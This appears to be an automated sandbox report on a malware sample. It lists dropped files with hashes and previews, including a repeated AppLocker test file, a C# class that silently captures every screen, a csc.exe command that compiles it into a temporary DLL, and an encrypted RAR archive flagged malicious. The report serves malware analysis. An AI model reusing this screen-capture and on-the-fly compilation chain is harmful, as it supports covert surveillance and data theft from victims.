                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                                                                                            Entropy (8bit):3.1023073394712952
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQ02ak7Ynqqx0nPN5Dlq5J:+RI+ycuZhN+ZakSxuPNnqX
                                                                                                                                                                                                                                                            MD5:974279E27BBE460754B17B004FF5D76F
                                                                                                                                                                                                                                                            SHA1:F69B6C2A15020DEAD4A8595421139E38149B4F17
                                                                                                                                                                                                                                                            SHA-256:8EE439173C321ECFF0B95B9C425644178F1963FC77A1C3D3E1E11957C4892D3F
                                                                                                                                                                                                                                                            SHA-512:E2CA46D4722F0D5DC9FEAA53AC1E5ED8A12723068125DB6F6A7D204185C08458610237B852FCCCDDA34F15D22E655DC9378CCA6273EA9DA0B3E359DF9239E904
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.r.d.w.4.v.5.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.r.d.w.4.v.5.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1004
                                                                                                                                                                                                                                                            Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):609
                                                                                                                                                                                                                                                            Entropy (8bit):5.318107199001923
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5923fD:p37Lvkmb6KOkqe1xBkrk+ikq0pWZE20U
                                                                                                                                                                                                                                                            MD5:89F28351AD507B234B30858694BD366C
                                                                                                                                                                                                                                                            SHA1:DDED8F4262190F65C4FF1EEDF5C87248847B23B2
                                                                                                                                                                                                                                                            SHA-256:62EA7E154F3FE0085E310FF92E4C64E345DE8AEE9E665CF99C417658803E12F9
                                                                                                                                                                                                                                                            SHA-512:38F287E166B4AB1C3E666B6B2F93531F31EC5BF529581B92EC8AC734E0D711DB0B1F2B5D6B328C11E955B5FEE88867C371F630C134412A9BC051CA77EEEB92A7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.0.cs"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                                                                                            Entropy (8bit):3.161174015959242
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:677oEAtf0KhzBU/dwf6mtJ5N0IDpW1ulMa3Qq:1Nz0d/mBO+KK
                                                                                                                                                                                                                                                            MD5:30E79574B713F4A26879755620494139
                                                                                                                                                                                                                                                            SHA1:CB5AD0DA25AA29A69EC30A88D56FBEEBC906E444
                                                                                                                                                                                                                                                            SHA-256:49FFFF75AC2679795CBFAA7EC7F4E8AF731067EBE8DBD6A2C4BAAF44F6C5ACAE
                                                                                                                                                                                                                                                            SHA-512:E41085B6536D736AF8F1108AA6CA7A3891E43934A4522434CE4477C3AF9319DFC9AA7402BDE8E47C8198F9FACE44B228E2FE19BA7600DC8D14F918D46C6CE800
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.|g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                            Size (bytes):1150
                                                                                                                                                                                                                                                            Entropy (8bit):5.489361946573571
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:KLWtId3ka6KOkqeFkq9E2sKax5DqBVKVrdFAMBJTH:2Wtkka6NkqeFkq9E2sK2DcVKdBJj
                                                                                                                                                                                                                                                            MD5:29306C6C81A093AF741B7BB96E990C5F
                                                                                                                                                                                                                                                            SHA1:2633A9C14FE68ED758B1F8022BB77333CB860D29
                                                                                                                                                                                                                                                            SHA-256:9A975D9E814CAF07157285BE2272309ABE0BD1FD93A66B984D8E21AF58572E4F
                                                                                                                                                                                                                                                            SHA-512:D3F59E309A4F6FE69812C0815F5A8D3FE9DBA8D26AF9FB59012FC4EC5637A71CE06D9B4AD7F77F55B55C0359EB655B77EAA90345AA52D091D6BBE1E0C8FDC30D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no long
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe
                                                                                                                                                                                                                                                            File Type:RAR archive data, v5
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):755646
                                                                                                                                                                                                                                                            Entropy (8bit):7.999786965092346
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:12288:GflECq8tn1KWUXjI4sr+F/B9pUnqsF8P+NyuWDrj2SbSXxu9r2yt6E5CQM8ADsG:ql51LfADsSF/vsF8AW3Ex+2a6fDsG
                                                                                                                                                                                                                                                            MD5:ABAC0FE9DEC427B2761FA69F5E5BDC17
                                                                                                                                                                                                                                                            SHA1:51FAC5BC736F0DEE59D85DF0E160B8E1BD20C4D2
                                                                                                                                                                                                                                                            SHA-256:6FB5E81A8A82C998E7F46CB456AE23EA8E5065A401C025DA15C849D729C36E45
                                                                                                                                                                                                                                                            SHA-512:ADD413353132C0472ED582BA06C1A5596EA5B783449C3AABB2163D38FF4245DE9958EB4B7DE3A28A91C390D12AD06E1F43B784E94113B665D2FCAE7D083CEDF7
                                                                                                                                                                                                                                                            Malicious:true
